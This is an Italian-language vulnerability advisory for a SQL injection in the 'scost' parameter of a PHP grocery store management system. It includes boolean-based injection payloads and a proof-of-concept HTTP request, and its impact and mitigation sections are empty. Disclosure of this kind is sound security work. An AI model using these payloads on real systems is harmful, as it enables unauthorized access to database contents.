
CVE-2026-37149 - Vulnerabilità di SQL Injection nel parametro scost di search_products.php in GROCERY-STORE-MANAGEMENT-SYSTEM-USING-PHP-AND-MYSQL-PHPMYADMIN v1.0.
CVE-2026-37149 SQL Injection in GROCERY-STORE-MANAGEMENT-SYSTEM-USING-PHP-AND-MYSQL-PHPMYADMIN v1.0
Panoramica
ID CVE: CVE-2026-37149 Tipo di vulnerabilità: SQL Injection (CWE-89) Gravità: Alta Scopritore: Dhyey Patel
Descrizione
GROCERY-STORE-MANAGEMENT-SYSTEM-USING-PHP-AND-MYSQL-PHPMYADMIN v1.0 contiene una vulnerabilità di SQL Injection nel parametro "scost" di "/grocery/search_products.php".
L'applicazione non convalida correttamente l'input fornito dall'utente prima di incorporarlo nelle query SQL. Un attaccante può iniettare espressioni SQL appositamente formulate tramite il parametro vulnerabile e manipolare le query del database di backend.
Lo sfruttamento riuscito può consentire l'accesso non autorizzato a informazioni sensibili del database e l'esecuzione di istruzioni SQL arbitrarie.
Prodotto interessato
Prodotto: GROCERY-STORE-MANAGEMENT-SYSTEM-USING-PHP-AND-MYSQL-PHPMYADMIN
Versione: v1.0
Repository del fornitore:
https://github.com/anirudhkannanvp/GROCERY-STORE-MANAGEMENT-SYSTEM-USING-PHP-AND-MYSQL-PHPMYADMIN-
Componente interessato
Tipo di attacco Remoto
Informazioni sul fornitore Progetto open-source mantenuto dal proprietario del repository: https://github.com/anirudhkannanvp
Dettagli tecnici
La vulnerabilità è stata confermata utilizzando tecniche di SQL Injection basate su Boolean.
Payload condizione TRUE
-1 OR 321=6 AND 000483=000483 --
Payload condizione FALSE
-1 OR 320=6 AND 000483=000483 --
Le risposte dell'applicazione differivano in base al fatto che la condizione iniettata fosse valutata TRUE o FALSE, confermando la SQL Injection.
Ulteriori test hanno confermato la corretta esecuzione di funzioni SQL tra cui:
SELECT database()
Il nome del database restituito era:
grocery
Ciò dimostra che è possibile eseguire query SQL arbitrarie tramite il parametro vulnerabile.
Prova di concetto
Richiesta
POST /grocery/search_products.php HTTP/1.1 Host: localhost X-Requested-With: XMLHttpRequest Content-Type: application/x-www-form-urlencoded
scategory=1& scost=-1 OR 321=6 AND 000483=000483 -- & sitem_name=test& spid=1& submit=Search%20For%20products
Risultato
La risposta cambia in base alla condizione booleana iniettata, confermando la SQL Injection nel parametro "scost".
Impatto
Gli impatti potenziali includono:
Mitigazione
Gli sviluppatori dovrebbero:
Riferimenti OWASP SQL Injection https://owasp.org/www-community/attacks/SQL_Injection
Programma CVE di MITRE https://www.cve.org
Crediti Scoperto e segnalato da: Dhyey Patel